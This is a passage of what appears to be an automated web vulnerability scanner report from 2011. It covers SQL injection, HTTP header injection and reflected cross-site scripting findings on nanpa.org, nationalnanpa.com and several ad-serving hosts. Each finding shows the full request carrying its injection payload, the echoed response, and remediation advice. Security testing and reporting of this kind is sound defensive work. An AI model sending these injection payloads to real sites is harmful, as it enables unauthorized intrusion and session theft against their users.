Request 1

POST /nas/public/assigned_code_query_step1.do?method=selectNpas HTTP/1.1
Host: www.nationalnanpa.com
Proxy-Connection: keep-alive
Referer: http://www.nationalnanpa.com/nas/public/assigned_code_query_step1.do?method=selectNpas
Cache-Control: max-age=0
Origin: http://www.nationalnanpa.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=82268809.1305158784.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=82268809.597827469.1305158784.1305158784.1305158784.1; nanpaid=nf1vNL0Qhz7LjnCZwmBG3dy5hQCtnCVwhWVvQJJzxxb4hJgtm3h2!1521367000; BIGipServernas-ns=2869930176.20480.0000
Content-Length: 52

codeQueryModel.stateAbbr=AK13320976'%20or%201%3d1--%20&codeQueryModel.nasNpaId=

Response 1

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 01:14:44 GMT
Server: Apache
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 18780


<html>
<head>
<LINK REL="stylesheet" href="/nas/public/css/neustar.css">
<META HTTP-EQUIV="Pragma" CONTENT="no-cache">
<META NAME="EXPIRES" CONTENT="0">
<META NAME="CONTRIBUTORS"
...[SNIP]...
</option>
<option value="442">442</option>
<option value="938">938</option>
<option value="458">458</option>
<option value="534">534</option>
<option value="929">929</option>
<option value="952">952</option>
<option value="956">956</option>
<option value="970">970</option>
<option value="972">972</option>
<option value="386">386</option>
<option value="380">380</option>
<option value="628">628</option>
<option value="951">951</option>
<option value="769">769</option>
<option value="684">684</option>
<option value="762">762</option>
<option value="424">424</option>
<option value="779">779</option>
<option value="575">575</option>
<option value="657">657</option>
<option value="681">681</option>
<option value="747">747</option>
<option value="872">872</option>
<option value="531">531</option>
<option value="327">327</option>
<option value="539">539</option>
<option value="201">201</option>
<option value="202">202</option>
<option value="203">203</option>
<option value="205">205</option>
<option value="206">206</option>
<option value="207">207</option>
<option value="208">208</option>
<option value="209">209</option>
<option value="210">210</option>
<option value="212">212</option>
<option value="213">213</option>
<option value="215">215</option>
<option value="217">217</option>
<option value="219">219</option>
<option value="225">225</option>
<option value="229">229</option>
<option value="234">234</option>
<option value="240">240</option>
<option value="252">252</option>
<option value="253">253</option>
<option value="256">256</option>
<option value="262">262</option>
<option value="269">269</option>
<option value="281">281</option>
<option value="301">301</option>
<option value="303">303</option>
<option value="305">305</option>
<option value="307">307</option>
<option value="309">309</option>
<option value="312">312</option>
<option value="314">314</option>
<option value="316">316</option>
<option value="318">318</
...[SNIP]...

Request 2

POST /nas/public/assigned_code_query_step1.do?method=selectNpas HTTP/1.1
Host: www.nationalnanpa.com
Proxy-Connection: keep-alive
Referer: http://www.nationalnanpa.com/nas/public/assigned_code_query_step1.do?method=selectNpas
Cache-Control: max-age=0
Origin: http://www.nationalnanpa.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=82268809.1305158784.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=82268809.597827469.1305158784.1305158784.1305158784.1; nanpaid=nf1vNL0Qhz7LjnCZwmBG3dy5hQCtnCVwhWVvQJJzxxb4hJgtm3h2!1521367000; BIGipServernas-ns=2869930176.20480.0000
Content-Length: 52

codeQueryModel.stateAbbr=AK13320976'%20or%201%3d2--%20&codeQueryModel.nasNpaId=

Response 2

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 01:14:45 GMT
Server: Apache
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 8478


<html>
<head>
<LINK REL="stylesheet" href="/nas/public/css/neustar.css">
<META HTTP-EQUIV="Pragma" CONTENT="no-cache">
<META NAME="EXPIRES" CONTENT="0">
<META NAME="CONTRIBUTORS"
...[SNIP]...
</option></select>
</td>
</tr>

<tr>
<td colspan="2" align="center">
<br>
</td>
</tr>

<tr>
<td colspan="2" align="center">
<input type="submit" value="Continue">
<input type="reset" value="Reset">
</td>
</tr>
</table>

</form>


</td>
</tr>
<tr height="2%">
<td colspan="2" align="center">
<!-- Start Footer -->
<table width="100%" border="0" cellspacing="0" cellpadding="0">
<tr>
<td align="center" valign="middle" height="2" colspan="3" bgcolor="#cccccc"><img src="/nas/public/images/px_CCCCCC.gif" width="1" height="1"></td>
</tr>
<tr>
<td align="left" valign="middle" width="81"><a href="http://www.neustar.biz" target="_blank"><img src="/nas/public/images/neustar_logo.gif" width="81" height="19" border="0" alt="www.neustar.biz"></a></td>
<td align="center" valign="middle" width="464">
<span class="footer">&copy; 2010 NeuStar, Inc.</span>
<a class="footer" href="http://www.nanpa.com/content/legalNotice.html">Legal Notice/Disclaimer</a>.
</td>
<td align="right" valign="middle" width="200">
<p class="footer">Last updated:
<script language="JavaScript">
<!-- Begin
var months = new Array(13);
months[1] = "January";
months[2] = "February";
months[3] = "March";
months[4] = "April";
months[5] = "May";
months[6] = "June";
months[7] = "July";
months[8] = "August";
months[9] = "September";
months[10] = "October";
months[11] = "November";
months[12] = "December";
var dateObj = new Date(document.lastModified);
var lmonth = months[dateObj.getMonth() + 1];
var date = dateObj.getDate();
var fyear = dateObj.getYear();
if (fyear < 2000)
fyear += 1900;
document.write(lmonth + " " + date + ",
...[SNIP]...

2. HTTP header injection  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/connectedplanet.iclick.com/adtarget

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 7cb05%0d%0a98d04ffcdd0 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.

Request

GET /7cb05%0d%0a98d04ffcdd0/connectedplanet.iclick.com/adtarget;subss=;subs=news;area=bss_oss;site=connectedplanet;kw=;sz=640x480;pos=introstitial;spon=;ord=63786.06336656958 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://connectedplanetonline.com/bss_oss/news/purchase-from-evolving-systems-will-broaden-neustar-numbering-business-0422/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/7cb05
98d04ffcdd0
/connectedplanet.iclick.com/adtarget;subss=;subs=news;area=bss_oss;site=connectedplanet;kw=;sz=640x480;pos=introstitial;spon=;ord=63786.06336656958:
Date: Thu, 12 May 2011 00:49:48 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

3. Cross-site scripting (reflected)  previous  next
There are 31 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


3.1. http://ds.addthis.com/red/psi/sites/nanpa.org/p.json [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.addthis.com
Path:   /red/psi/sites/nanpa.org/p.json

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload c7cf3<script>alert(1)</script>85e81b10871 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /red/psi/sites/nanpa.org/p.json?callback=_ate.ad.hprc7cf3<script>alert(1)</script>85e81b10871&uid=4dab4fa85facd099&url=http%3A%2F%2Fnanpa.org%2Fabout_overview.php&ref=http%3A%2F%2Fnanpa.org%2F&1otax1h HTTP/1.1
Host: ds.addthis.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh42.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; uit=1; dt=X; di=%7B%7D..1305126976.1FE|1305126976.1OD|1305126976.60; psc=4; uid=4dab4fa85facd099

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 131
Content-Type: text/javascript
Set-Cookie: bt=; Domain=.addthis.com; Expires=Thu, 12 May 2011 00:04:23 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Sat, 11 Jun 2011 00:04:23 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Thu, 12 May 2011 00:04:23 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 12 May 2011 00:04:23 GMT
Connection: close

_ate.ad.hprc7cf3<script>alert(1)</script>85e81b10871({"urls":[],"segments" : [],"loc": "MjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg=="})

3.2. http://img.mediaplex.com/content/0/12688/127209/SP_IPv6_640x480_timer.js [mpck parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/12688/127209/SP_IPv6_640x480_timer.js

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2985c"-alert(1)-"00cb3ba448f was submitted in the mpck parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/12688/127209/SP_IPv6_640x480_timer.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F12688-127209-4062-0%3Fmpt%3D69779922985c"-alert(1)-"00cb3ba448f&mpt=6977992&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3b05/3/0/%2a/g%3B240931323%3B0-0%3B1%3B44107191%3B1412-640/480%3B42045209/42062996/1%3B%3B%7Esscs%3D%3f HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://connectedplanetonline.com/bss_oss/news/purchase-from-evolving-systems-will-broaden-neustar-numbering-business-0422/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; __utmz=183366586.1303926238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.719740200.1303926238.1303926238.1303926238.1; mojo2=17912:1281/16228:26209; mojo3=13198:5934/13305:22136/17263:25710/17113:25710/16186:22724/15368:22624/16228:16454/10105:1629/14302:16279/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:48:37 GMT
Server: Apache
Last-Modified: Sat, 16 Apr 2011 01:07:44 GMT
ETag: "6cd3c7-f61-4a0fec92ab800"
Accept-Ranges: bytes
Content-Length: 4747
Content-Type: application/x-javascript

var mojopro2 = window.location.protocol;
if (mojopro2 == "https:") {
mojosrc = "https://secure.img-cdn.mediaplex.com/0/documentwrite.js";
}
else
{
mojosrc = "http://img-cdn.mediaplex.com/0/documentw
...[SNIP]...
<mpcke/>';
if (mpcke == 1) {
mpcclick = encodeURIComponent("altfarm.mediaplex.com%2Fad%2Fck%2F12688-127209-4062-0%3Fmpt%3D69779922985c"-alert(1)-"00cb3ba448f");
mpck = "http://" + mpcclick;
}
else if (mpcke == 2) {
mpcclick2 = encodeURIComponent("altfarm.mediaplex.com%2Fad%2Fck%2F12688-127209-4062-0%3Fmpt%3D69779922985c"-alert(1)-"00cb3ba448f");
mpck = "ht
...[SNIP]...

3.3. http://img.mediaplex.com/content/0/12688/127209/SP_IPv6_640x480_timer.js [mpck parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/12688/127209/SP_IPv6_640x480_timer.js

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 79a8d'%3balert(1)//6e9127e7ac0 was submitted in the mpck parameter. This input was echoed as 79a8d';alert(1)//6e9127e7ac0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/12688/127209/SP_IPv6_640x480_timer.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F12688-127209-4062-0%3Fmpt%3D697799279a8d'%3balert(1)//6e9127e7ac0&mpt=6977992&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3b05/3/0/%2a/g%3B240931323%3B0-0%3B1%3B44107191%3B1412-640/480%3B42045209/42062996/1%3B%3B%7Esscs%3D%3f HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://connectedplanetonline.com/bss_oss/news/purchase-from-evolving-systems-will-broaden-neustar-numbering-business-0422/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; __utmz=183366586.1303926238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.719740200.1303926238.1303926238.1303926238.1; mojo2=17912:1281/16228:26209; mojo3=13198:5934/13305:22136/17263:25710/17113:25710/16186:22724/15368:22624/16228:16454/10105:1629/14302:16279/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:48:39 GMT
Server: Apache
Last-Modified: Sat, 16 Apr 2011 01:07:44 GMT
ETag: "6cd3c7-f61-4a0fec92ab800"
Accept-Ranges: bytes
Content-Length: 4753
Content-Type: application/x-javascript

var mojopro2 = window.location.protocol;
if (mojopro2 == "https:") {
mojosrc = "https://secure.img-cdn.mediaplex.com/0/documentwrite.js";
}
else
{
mojosrc = "http://img-cdn.mediaplex.com/0/documentw
...[SNIP]...
<a href="http://ad.doubleclick.net/click;h=v8/3b05/3/0/*/g;240931323;0-0;1;44107191;1412-640/480;42045209/42062996/1;;~sscs=?http://altfarm.mediaplex.com/ad/ck/12688-127209-4062-0?mpt=697799279a8d';alert(1)//6e9127e7ac0" target="_blank">
...[SNIP]...

3.4. http://img.mediaplex.com/content/0/12688/127209/SP_IPv6_640x480_timer.js [mpvc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/12688/127209/SP_IPv6_640x480_timer.js

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b8682"%3balert(1)//c72977f9130 was submitted in the mpvc parameter. This input was echoed as b8682";alert(1)//c72977f9130 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/12688/127209/SP_IPv6_640x480_timer.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F12688-127209-4062-0%3Fmpt%3D6977992&mpt=6977992&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3b05/3/0/%2a/g%3B240931323%3B0-0%3B1%3B44107191%3B1412-640/480%3B42045209/42062996/1%3B%3B%7Esscs%3D%3fb8682"%3balert(1)//c72977f9130 HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://connectedplanetonline.com/bss_oss/news/purchase-from-evolving-systems-will-broaden-neustar-numbering-business-0422/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; __utmz=183366586.1303926238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.719740200.1303926238.1303926238.1303926238.1; mojo2=17912:1281/16228:26209; mojo3=13198:5934/13305:22136/17263:25710/17113:25710/16186:22724/15368:22624/16228:16454/10105:1629/14302:16279/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:49:34 GMT
Server: Apache
Last-Modified: Sat, 16 Apr 2011 01:07:44 GMT
ETag: "6cd3c7-f61-4a0fec92ab800"
Accept-Ranges: bytes
Content-Length: 4749
Content-Type: application/x-javascript

var mojopro2 = window.location.protocol;
if (mojopro2 == "https:") {
mojosrc = "https://secure.img-cdn.mediaplex.com/0/documentwrite.js";
}
else
{
mojosrc = "http://img-cdn.mediaplex.com/0/documentw
...[SNIP]...
<mpvce/>';
if (mpvce == 1) {
mpvclick = encodeURIComponent("http://ad.doubleclick.net/click;h=v8/3b05/3/0/*/g;240931323;0-0;1;44107191;1412-640/480;42045209/42062996/1;;~sscs=?b8682";alert(1)//c72977f9130");
mpvc = mpvclick;
}
else if (mpvce == 2) {
mpvclick2 = encodeURIComponent("http://ad.doubleclick.net/click;h=v8/3b05/3/0/*/g;240931323;0-0;1;44107191;1412-640/480;42045209/42062996/1;;~sscs=?b8682";
...[SNIP]...

3.5. http://img.mediaplex.com/content/0/12688/127209/SP_IPv6_640x480_timer.js [mpvc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/12688/127209/SP_IPv6_640x480_timer.js

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4c994'%3balert(1)//62b09341242 was submitted in the mpvc parameter. This input was echoed as 4c994';alert(1)//62b09341242 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/12688/127209/SP_IPv6_640x480_timer.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F12688-127209-4062-0%3Fmpt%3D6977992&mpt=6977992&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3b05/3/0/%2a/g%3B240931323%3B0-0%3B1%3B44107191%3B1412-640/480%3B42045209/42062996/1%3B%3B%7Esscs%3D%3f4c994'%3balert(1)//62b09341242 HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://connectedplanetonline.com/bss_oss/news/purchase-from-evolving-systems-will-broaden-neustar-numbering-business-0422/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; __utmz=183366586.1303926238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.719740200.1303926238.1303926238.1303926238.1; mojo2=17912:1281/16228:26209; mojo3=13198:5934/13305:22136/17263:25710/17113:25710/16186:22724/15368:22624/16228:16454/10105:1629/14302:16279/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:49:36 GMT
Server: Apache
Last-Modified: Sat, 16 Apr 2011 01:07:44 GMT
ETag: "6cd3c7-f61-4a0fec92ab800"
Accept-Ranges: bytes
Content-Length: 4749
Content-Type: application/x-javascript

var mojopro2 = window.location.protocol;
if (mojopro2 == "https:") {
mojosrc = "https://secure.img-cdn.mediaplex.com/0/documentwrite.js";
}
else
{
mojosrc = "http://img-cdn.mediaplex.com/0/documentw
...[SNIP]...
<a href="http://ad.doubleclick.net/click;h=v8/3b05/3/0/*/g;240931323;0-0;1;44107191;1412-640/480;42045209/42062996/1;;~sscs=?4c994';alert(1)//62b09341242http://altfarm.mediaplex.com/ad/ck/12688-127209-4062-0?mpt=6977992" target="_blank">
...[SNIP]...

3.6. http://nanpa.org/about_overview.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nanpa.org
Path:   /about_overview.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 55190<script>alert(1)</script>17c6ad3db83 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /about_overview.php55190<script>alert(1)</script>17c6ad3db83 HTTP/1.1
Host: nanpa.org
Proxy-Connection: keep-alive
Referer: http://nanpa.org/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fsize=12

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 00:04:27 GMT
Server: Apache
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR NOR BUS UNI COM NAV INT", policyref="/w3c/p3p.xml"
Content-Type: text/html
Content-Length: 20834

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
<span class="redtext">http://nanpa.org/about_overview.php55190<script>alert(1)</script>17c6ad3db83</span>
...[SNIP]...

3.7. http://nanpa.org/awards_overview.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nanpa.org
Path:   /awards_overview.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d88e0<script>alert(1)</script>66b1f6a06d6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /awards_overview.phpd88e0<script>alert(1)</script>66b1f6a06d6 HTTP/1.1
Host: nanpa.org
Proxy-Connection: keep-alive
Referer: http://nanpa.org/education_overview.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fsize=12

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 00:05:10 GMT
Server: Apache
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR NOR BUS UNI COM NAV INT", policyref="/w3c/p3p.xml"
Content-Type: text/html
Content-Length: 20835

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
<span class="redtext">http://nanpa.org/awards_overview.phpd88e0<script>alert(1)</script>66b1f6a06d6</span>
...[SNIP]...

3.8. http://nanpa.org/education_overview.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nanpa.org
Path:   /education_overview.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 593f4<script>alert(1)</script>c968a8dfd53 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /education_overview.php593f4<script>alert(1)</script>c968a8dfd53 HTTP/1.1
Host: nanpa.org
Proxy-Connection: keep-alive
Referer: http://nanpa.org/history.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fsize=12

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 00:05:07 GMT
Server: Apache
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR NOR BUS UNI COM NAV INT", policyref="/w3c/p3p.xml"
Content-Type: text/html
Content-Length: 20838

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
<span class="redtext">http://nanpa.org/education_overview.php593f4<script>alert(1)</script>c968a8dfd53</span>
